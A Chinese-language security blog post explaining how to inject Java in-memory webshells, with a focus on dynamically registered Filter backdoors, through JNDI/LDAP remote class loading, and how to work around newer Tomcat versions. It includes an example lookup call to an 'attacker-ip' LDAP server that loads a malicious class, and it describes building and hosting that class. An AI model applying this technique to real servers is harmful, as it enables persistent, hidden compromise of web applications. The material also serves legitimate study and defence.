JNDI注入内存马并绕过Tomcat高版本-先知社区

先来说说内存马，基本上常见的注入类型有四种，

●

基于ServletAPI的，具体来说就是动态注册Servlet、Filter或Listener

●

基于SpringMVC的，具体来说是动态注册Controller或Interceptor

●

通过注册Tomcat的Pipeline和Valve机制注册的

●

还有一种是Agent内存马，agentmain类型的agent可以attach到一个正在运行的Java进程上，并且可以根据需要修改或重新转换已被加载或需要被加载的类，鉴于此，我们可以修改某个类的字节码。比如修改ApplicationFilterChain中的doFilter方法，在方法前面加入我们的恶意后门。当然理论上来说，改Controller或者Interceptor都行的。使用时根据需要自行修改类即可。

一般来说我更喜欢基于ServletAPI的动态注册Filter方式注入内存马，理由是通用型更强，目标系统无需依赖SpringMVC也能用。还有一个是根据请求的调用过程，如果存在鉴权的情况，请求不一定能走到Servlet，相比你们一定见过访问网页跳转/login登录页的情况，那这种情况即使注册为Servlet访问不到也没用，但是Filter比Servlet有更高的优先级。鉴于此，本文下文均使用动态注册Filter类型内存马的方式。

前提是需要一个ServletRequest对象，因为我们需要动态注册用到的属性或者方法在StandardContext的实例对象中，而这个实例对象恰好可以通过Request对象通过一系列反射调用得到。这个好说，在jsp、Servlet#doGet/doPost、Filter#doFilter、Controller...等地方中均可轻松获取到当前请求的Request对象。下面就是动态注册一个Filter的典型过程。

只要访问一次这个jsp文件，一个Filter内存马就会被动态注册到JavaWeb应用中。

不过这还是要事先上传一个jsp文件到服务器上的，与无文件落地的理念相悖，不够优雅。且并非所有情况下均能访问或解析jsp文件。那么有没有一种方式不用上传文件也能注入内存马呢？有的，JNDI就可以让Java去下载一个远程的class文件并执行。经典的漏洞有fastjson1.2.24（JdbcRowSetImpl利用链）和log4j2。

JNDI

JNDI允许通过命名服务动态加载远程对象，当lookup()方法的URL参数可控时，攻击者可构造恶意JNDI服务地址（RMI/LDAP），诱导客户端访问攻击者控制的目录服务。

再回顾一下JNDI的注入流程：

攻击端（Ldap为例）

编写恶意类

编译恶意类并托管在HTTP服务器

启动LDAP服务并将引用指向上一步Http服务器中的恶意类：

受害者端触发

客户端执行可控代码：context.lookup("ldap://attacker-ip:1389/Exploit")

JNDI客户端请求LDAP服务

LDAP返回恶意Reference对象

客户端解析Reference时：

从codebase指定URL动态加载

实例化恶意类触发构造函数/static代码块

结合内存马使用

不过这里下载的类中会被自动执行的地方只有三个代码块，分别是static{}，{}和无参构造方法。所以上面的注入代码就需要改造一下了。问题就来了，这三个地方可没有Request对象传入，我们要怎么拿到StandardContext呢？参考这篇文章：

https://xz.aliyun.com/news/9369

如果是Tomcat可以通过这段代码拿到（重点要说明一下，最后版本不兼容的坑也就出现在这里）

如果依赖了Spring框架可以先用下面的方法取得Request

注入内存马

准备了一个受害者环境，环境是Tomcat8（非Tomcat8.5及以上版本）和Java8u62（在 JDK 8u191 com.sun.jndi.ldap.object.trustURLCodebase属性的默认值被调整为false，这会导致无法下载远程类到本地，也就是无法利用。但是还是会有绕过方式。本文不做赘述。）。可以从

https://archive.apache.org/dist/tomcat/tomcat-8/

中下载。新建项目